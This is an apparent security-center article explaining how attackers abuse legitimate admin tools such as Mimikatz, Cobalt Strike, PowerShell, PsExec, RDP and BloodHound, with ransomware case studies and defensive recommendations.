Administrative Tools Turned Malicious: How Cybercriminals Exploit Legitimate Software

Introduction: When Good Tools Go Bad — How Cybercriminals Exploit Admin Software

In the hands of IT professionals, administrative tools are essential. They help manage systems, automate tasks, troubleshoot issues, and secure networks. But in the wrong hands, these same tools can become powerful weapons. Cybercriminals are increasingly repurposing legitimate software to infiltrate networks, steal data, and deploy malware—without setting off alarms.

This tactic, often called “living off the land,” allows attackers to blend in with normal network activity. They use trusted tools already installed in many environments or easily available online. Tools like Mimikatz, Cobalt Strike, and PowerShell were never designed for malicious activity, yet they’ve become staples in modern cyberattacks.

High-profile threats like Maze, NotPetya, REvil, and Ryuk have all demonstrated how effective these tools can be when used for harm. Criminal groups and nation-state actors alike are leveraging them to breach defenses, move laterally within networks, and escalate privileges, often evading traditional security measures.

This article explores how attackers misuse legitimate administrative tools, examines real-world examples of their impact, and outlines what organizations can do to defend against these evolving threats.

Understanding Administrative Tools and Their Legitimate Uses

Administrative tools are essential for IT professionals managing complex systems and networks. They help streamline tasks like configuring devices, automating workflows, troubleshooting issues, and ensuring network security. These tools are typically designed to make life easier for administrators, enabling them to maintain systems efficiently and securely.

For example, PowerShell is a built-in Windows command-line tool that allows administrators to automate tasks across large numbers of devices. It can configure user accounts, manage software updates, and pull system information from remote machines. Tools like PsExec, part of Microsoft’s Sysinternals suite, allow administrators to execute commands on remote systems without needing to be physically present. This is invaluable for managing large enterprise networks.

Other tools, like Mimikatz, were developed for security research and penetration testing. Mimikatz helps security professionals uncover weaknesses in credential storage by demonstrating how easy it can be to extract passwords from memory. Similarly, Cobalt Strike was designed as a penetration testing platform that emulates adversary behavior. Security teams use it to simulate attacks in controlled environments, testing an organization’s defenses.

Remote Desktop Protocol (RDP) is another legitimate tool. It provides administrators and users with remote access to computers over a network. RDP allows IT teams to troubleshoot and manage systems without being onsite, reducing downtime and improving efficiency.

BloodHound is often used by security teams to analyze and visualize Active Directory environments. It helps identify potential privilege escalation paths and misconfigurations that could allow attackers to move through a network.

In legitimate use cases, these tools are powerful allies. They help organizations manage vast infrastructures and test the strength of their security. However, because of their capabilities, they are also attractive to cybercriminals. When attackers gain access to these tools—or their illicit versions—they can leverage them to conduct stealthy, damaging operations that are hard to detect. The same features that make them useful to administrators can make them dangerous in the wrong hands.

How Cybercriminals Misuse These Tools

Cybercriminals are opportunists. Instead of relying solely on custom-built malware that risks detection, they often turn to legitimate administrative tools. This strategy, known as “living off the land,” lets attackers blend in with normal network activity. By using software that IT departments already trust and rely on, they can operate under the radar for longer periods, increasing the damage they inflict.

These tools offer cybercriminals several advantages. First, they’re widely available. Many are open-source or built into operating systems—PowerShell, PsExec, and RDP come preinstalled on millions of machines. Second, they’re familiar to security teams, making it harder to distinguish legitimate use from malicious activity. And third, they don’t always trigger antivirus or endpoint detection systems because they aren’t inherently malicious.

Here’s how attackers typically misuse these tools:

1. Credential Theft and Privilege Escalation
Attackers often start by stealing user credentials. Tools like Mimikatz allow them to extract passwords, hashes, and tickets directly from system memory. Once they have administrative credentials, they can escalate privileges and gain wider access across a network.

2. Lateral Movement Across Networks
After gaining a foothold, cybercriminals use tools like PsExec, PowerShell, and RDP to move laterally between systems. They execute commands remotely, deploy malware, and compromise additional endpoints—all without introducing external files that might raise suspicion.

3. Reconnaissance and Mapping
Understanding the network is critical for attackers. Tools like BloodHound help them map out Active Directory relationships, identify privileged accounts, and find pathways to high-value assets. This step is key for planning a broader attack, including ransomware deployment.

4. Malware Delivery and Command Execution
Cobalt Strike is a favorite for post-exploitation. Although designed for penetration testers, attackers use pirated versions to deploy beacons, execute commands, and control compromised systems. Its ability to evade detection and mimic legitimate traffic makes it particularly dangerous.

5. Data Exfiltration and Encryption
Once attackers have access, they often exfiltrate sensitive data or deploy ransomware. They may use PowerShell scripts or RDP sessions to move stolen files off the network. In ransomware cases, they use these tools to deliver and execute encryption payloads across an organization quickly.

Why “Living Off the Land” Is Effective

By abusing trusted tools, attackers minimize the need for custom malware that could trigger security alerts. Security teams face the challenge of distinguishing routine administrative activity from malicious actions. Monitoring every instance of PowerShell or RDP use can overwhelm even well-equipped teams. Plus, disabling these tools isn’t an option for most organizations, as they are essential for daily operations.

The result? A higher chance of success for attackers, and a much harder job for defenders.

In the next section, we’ll break down the most commonly abused tools, showing how they work and how attackers leverage them in real-world attacks.

Key Tools Exploited by Cybercriminals

Cybercriminals often rely on legitimate tools to execute their attacks. These tools offer powerful capabilities that, when abused, allow attackers to move silently through networks, steal credentials, and deliver malware without raising immediate suspicion. Below are some of the most commonly exploited administrative tools and how they are misused in real-world cyberattacks.

Mimikatz

Legitimate Use:
Mimikatz was originally developed as a proof-of-concept tool for demonstrating weaknesses in Windows authentication. Security professionals use it during penetration tests to show how easily credentials can be extracted from system memory.

How Attackers Abuse It:
Mimikatz allows attackers to dump plaintext passwords, hashes, PINs, and Kerberos tickets directly from system memory. With this information, they can impersonate legitimate users, escalate privileges, and move laterally through a network. The tool is often used in conjunction with pass-the-hash or pass-the-ticket techniques, letting attackers bypass password requirements entirely.

Example:
In the NotPetya attack, Mimikatz was instrumental. Once NotPetya infected a machine, it used Mimikatz to harvest administrator credentials. These credentials were then used to spread the malware across corporate networks, causing widespread damage.

Cobalt Strike

Legitimate Use:
Cobalt Strike is a commercial penetration testing tool designed to simulate advanced persistent threats (APTs). Security teams use it to emulate real-world attack scenarios, testing an organization’s defenses and response capabilities.

How Attackers Abuse It:
Cybercriminals and nation-state actors frequently use cracked or pirated versions of Cobalt Strike. Its “beacon” feature enables remote control of compromised systems. Attackers use it to execute commands, escalate privileges, and move laterally within a network. Its ability to encrypt traffic and mimic legitimate communication makes detection difficult.

Example:
REvil (Sodinokibi) ransomware operators have used Cobalt Strike extensively in their campaigns. After gaining initial access—often through phishing or supply chain attacks—they deploy Cobalt Strike beacons to establish persistence, conduct reconnaissance, and spread ransomware across victim environments.

PowerShell

Legitimate Use:
PowerShell is a powerful scripting language built into Windows, commonly used for system administration, task automation, and configuration management. IT teams rely on it to manage large numbers of machines efficiently.

How Attackers Abuse It:
PowerShell’s power and flexibility make it a favorite among attackers. They use it for fileless malware attacks, where no executable files are dropped on disk—helping avoid detection by antivirus software. PowerShell can download malicious payloads, escalate privileges, and exfiltrate data without raising alarms.

Example:
The Emotet trojan leveraged PowerShell to deliver additional malware payloads, including TrickBot and Ryuk ransomware. By using PowerShell scripts, attackers were able to avoid traditional detection methods and maintain a foothold within targeted networks.

PsExec

Legitimate Use:
PsExec is a Microsoft Sysinternals tool that lets administrators run commands on remote systems. It’s widely used for remote software deployment and troubleshooting.

How Attackers Abuse It:
Attackers use PsExec for lateral movement, executing commands remotely without triggering antivirus alerts. It’s often deployed to launch ransomware or other malware on multiple systems simultaneously after the attacker has obtained administrative credentials.

Example:
The Ryuk ransomware group used PsExec to deploy their ransomware payloads across infected networks. After gaining initial access and harvesting credentials, they used PsExec to manually push the Ryuk executable to critical systems, maximizing the attack’s impact.

Remote Desktop Protocol (RDP)

Legitimate Use:
RDP allows users and administrators to connect to a computer remotely over a network. It’s a critical tool for remote IT support and system management.

How Attackers Abuse It:
Attackers frequently scan for exposed RDP ports on the internet. Once they find an accessible system, they attempt to brute-force login credentials or exploit unpatched vulnerabilities. After gaining access, they can move laterally, exfiltrate data, and deploy ransomware.

Example:
The Dharma ransomware family often gains initial access to victim environments through poorly secured RDP connections. Attackers use stolen or weak credentials to log in and manually deploy ransomware to encrypt files.

BloodHound

Legitimate Use:
BloodHound is an Active Directory (AD) analysis tool used by security professionals to map relationships and permissions within an AD environment. It helps identify potential privilege escalation paths and security weaknesses.

How Attackers Abuse It:
Cybercriminals use BloodHound to gather intelligence on an organization’s AD structure. They identify accounts with high privileges, potential attack paths, and misconfigurations that can be exploited for domain escalation. This information is used to take over entire networks.

Example:
Affiliates of the Maze ransomware operation have been known to use BloodHound during the reconnaissance phase. By mapping out AD privileges and relationships, they streamlined their lateral movement and quickly gained control over targeted domains before deploying ransomware.

---

These tools aren’t inherently malicious. They play vital roles in network management, security assessments, and IT support. However, their capabilities make them attractive to cybercriminals. By co-opting these tools, attackers avoid detection, increase their chances of success, and inflict greater damage on targeted organizations.

Understanding how these tools are misused is key to building effective defenses. In the next section, we’ll examine specific case studies of malware campaigns that leveraged these tools to devastating effect.

---

Case Studies: Malware Leveraging Admin Tools

Real-world cyberattacks often reveal just how effective administrative tools can be in the hands of attackers. The following case studies highlight major malware campaigns where legitimate tools were repurposed to facilitate devastating breaches, data theft, and ransomware deployment. These examples demonstrate the tactics, techniques, and procedures (TTPs) used by cybercriminals to exploit trusted software and administrative utilities.

Maze Ransomware

Overview:
Maze ransomware emerged in 2019 and became notorious for combining encryption with data theft—an approach now known as double extortion. Victims not only faced encrypted files but also threats to leak sensitive data if they refused to pay the ransom.

How Admin Tools Were Used:
Maze operators often gained initial access through phishing emails or by exploiting vulnerabilities in remote desktop services. Once inside, they used a range of administrative tools to escalate their access and spread laterally.

• BloodHound was deployed to map Active Directory environments, identifying high-privilege accounts and attack paths.
• Mimikatz extracted administrator credentials from system memory, giving attackers control over additional systems.
• PowerShell was used to run scripts and automate the deployment of ransomware payloads across the network.

Impact:
Maze successfully infiltrated multiple large organizations, including law firms, healthcare providers, and manufacturing companies. The group published stolen data on its leak site to pressure victims into paying ransoms, often demanding millions of dollars.

NotPetya

Overview:
NotPetya was initially disguised as ransomware when it appeared in 2017. In reality, it was a destructive wiper designed to cause widespread disruption, primarily targeting Ukrainian organizations before spreading globally.

How Admin Tools Were Used:
After infecting its first targets via a compromised software update from accounting software provider MeDoc, NotPetya spread rapidly by exploiting administrative tools and stolen credentials.

• Mimikatz was embedded in NotPetya to extract administrator credentials from infected machines.
• With these credentials, attackers used PsExec and WMIC (Windows Management Instrumentation Command-line) to execute commands and distribute the malware across networked systems.

Impact:
NotPetya caused an estimated $10 billion in global damages. Major multinational companies, including Maersk and Merck, suffered catastrophic outages and data loss, disrupting operations for weeks.

REvil (Sodinokibi)

Overview:
REvil, also known as Sodinokibi, was one of the most prolific ransomware-as-a-service (RaaS) operations. Its operators targeted enterprises, managed service providers (MSPs), and supply chains, often demanding multimillion-dollar ransoms.

How Admin Tools Were Used:
REvil affiliates typically used phishing emails, exploit kits, or vulnerabilities in public-facing applications to gain initial access. Once inside, they used administrative tools for post-exploitation activities.

• Cobalt Strike was used to establish persistent access through its beacon agents. Attackers leveraged its extensive features for remote command execution, lateral movement, and data exfiltration.
• PowerShell scripts automated the deployment of ransomware payloads across compromised environments.

Impact:
One of REvil’s most high-profile attacks was the Kaseya VSA supply chain breach in 2021. The attack affected up to 1,500 businesses worldwide, leading to ransom demands reportedly reaching $70 million for universal decryption.

Ryuk Ransomware

Overview:
Ryuk ransomware targeted large enterprises and public sector organizations, often through highly targeted attacks. It became infamous for crippling hospitals, city governments, and private corporations, with ransom demands frequently exceeding seven figures.

How Admin Tools Were Used:
Ryuk campaigns typically began with an Emotet or TrickBot infection, which facilitated initial access and reconnaissance.

• After gaining domain administrator privileges, attackers used PsExec to execute Ryuk ransomware across endpoints within the network.
• RDP was exploited for remote access, enabling attackers to move laterally and manually deploy the malware to critical systems.

Impact:
Ryuk was responsible for significant operational disruptions in healthcare facilities, law enforcement agencies, and major corporations. One attack on Universal Health Services (UHS) in 2020 led to weeks of downtime and the diversion of emergency patients, highlighting the real-world consequences of ransomware.

---

These case studies show a recurring pattern: cybercriminals rely on legitimate tools to execute their attacks efficiently and covertly. Administrative tools like Mimikatz, Cobalt Strike, PowerShell, PsExec, and BloodHound are repurposed to steal credentials, map networks, and deploy malware, all while avoiding detection.

Understanding how these tools are used in high-profile attacks helps organizations anticipate and defend against similar tactics. In the next section, we’ll explore practical defensive strategies to mitigate the risks posed by the misuse of administrative tools.

---

Defensive Measures Against Misuse

Protecting against the misuse of administrative tools requires a layered approach. Since many of these tools are essential for legitimate IT operations, outright banning them isn’t feasible. Instead, organizations need to implement targeted security strategies that focus on minimizing risk, improving visibility, and responding quickly to suspicious activity. Here are key defensive measures to consider:

1. Enforce the Principle of Least Privilege

Limit user access rights to the bare minimum needed to perform their jobs. Administrative privileges should be tightly controlled and only granted when absolutely necessary. This reduces the potential for attackers to escalate privileges if they compromise a low-level user account.

• Regularly audit privileged accounts.
• Remove unnecessary administrator rights.
• Use separate accounts for administrative tasks and daily activities.

2. Monitor and Restrict the Use of Administrative Tools

Establish strict policies for when and how tools like PowerShell, PsExec, and RDP can be used.

• PowerShell:

  • Restrict to specific versions (e.g., PowerShell 5 with enhanced logging).
  • Enable and review module logging, script block logging, and transcription features.
  • Implement language mode restrictions to limit what scripts can execute.

• PsExec and Other Remote Execution Tools:

  • Block or restrict execution to approved administrators.
  • Monitor for abnormal PsExec activity, such as unusual times of use or execution from unauthorized systems.

• RDP:

  • Disable RDP if it’s not needed.
  • Require strong passwords and limit RDP access via VPN or jump servers.
  • Implement account lockout policies to thwart brute-force attacks.

3. Implement Multi-Factor Authentication (MFA)

Enforce MFA across all user accounts, especially those with administrative privileges or remote access. Even if attackers steal passwords using Mimikatz or similar tools, MFA provides an additional barrier to account compromise.

4. Network Segmentation and Access Controls

Segment internal networks to contain breaches. Critical systems should be isolated from less secure parts of the network.

• Use firewalls and VLANs to enforce segmentation.
• Limit east-west traffic (lateral movement) within the network.
• Ensure sensitive data and critical infrastructure are behind additional security layers.

5. Continuous Monitoring and Threat Detection

Deploy endpoint detection and response (EDR) tools capable of identifying and alerting on suspicious activity associated with administrative tools.

• Monitor for unusual PowerShell commands, PsExec usage, and unauthorized remote connections.
• Implement Security Information and Event Management (SIEM) solutions to centralize logging and analysis.
• Establish baselines for normal behavior and flag deviations.

6. Application Whitelisting and Execution Control

Restrict which applications and scripts can run on your systems.

• Implement application whitelisting to prevent unauthorized software from executing.
• Block known malicious versions of tools like Cobalt Strike or Mimikatz.
• Use Group Policy or endpoint controls to prevent the use of unsigned PowerShell scripts.

7. Credential Hygiene and Protection

Reduce the risk of credential theft by improving credential management practices.

• Regularly rotate and update passwords, especially for privileged accounts.
• Use password managers to enforce strong, unique passwords.
• Store credentials securely; never hard-code them into scripts.
• Disable clear-text password storage in LSASS, which Mimikatz often targets.

8. Regular Security Audits and Penetration Testing

Proactively identify and fix vulnerabilities before attackers exploit them.

• Conduct regular penetration tests, simulating attacks that use common administrative tools.
• Audit Active Directory environments to identify excessive permissions and potential attack paths (as revealed by tools like BloodHound).

9. User Awareness and Training

Educate employees on the risks of phishing and credential theft.

• Train staff to recognize phishing emails that may deliver malware or steal credentials.
• Teach IT administrators safe practices for using remote access tools and managing privileges.

---

Administrative tools are vital for managing and securing IT environments, but when misused by attackers, they can become serious threats. By enforcing strict access controls, enhancing monitoring, and maintaining strong credential hygiene, organizations can mitigate the risks associated with these tools. Defense isn’t about eliminating their use—it’s about ensuring they’re only used in legitimate, controlled, and transparent ways.

In the next section, we’ll wrap up with key takeaways and actions organizations should prioritize to stay protected.

---

Conclusion: Turning the Tables on Cybercriminals

Administrative tools like Mimikatz, Cobalt Strike, PowerShell, and PsExec are double-edged swords. In the right hands, they support IT management, security testing, and system maintenance. In the wrong hands, they become powerful weapons for cybercriminals—facilitating data breaches, ransomware attacks, and large-scale disruptions.

As shown by major incidents like Maze, NotPetya, REvil, and Ryuk, attackers often prefer to "live off the land," using these legitimate tools to operate stealthily inside victim networks. Their effectiveness lies in their ability to blend in, making detection and response more difficult for defenders.

The good news is that organizations can take steps to reduce the risk. By enforcing least privilege, monitoring tool usage, strengthening credential security, and segmenting networks, defenders can disrupt the tactics attackers rely on. Combining these strategies with regular security audits and user education builds a defense that makes it harder for cybercriminals to succeed.

The key is vigilance. Administrative tools will always be part of IT operations—but how they’re managed and monitored makes all the difference. Tighten controls, keep watch, and you’ll turn these tools back into what they were meant to be: assets, not liabilities.

 

 

« Back to the Security Center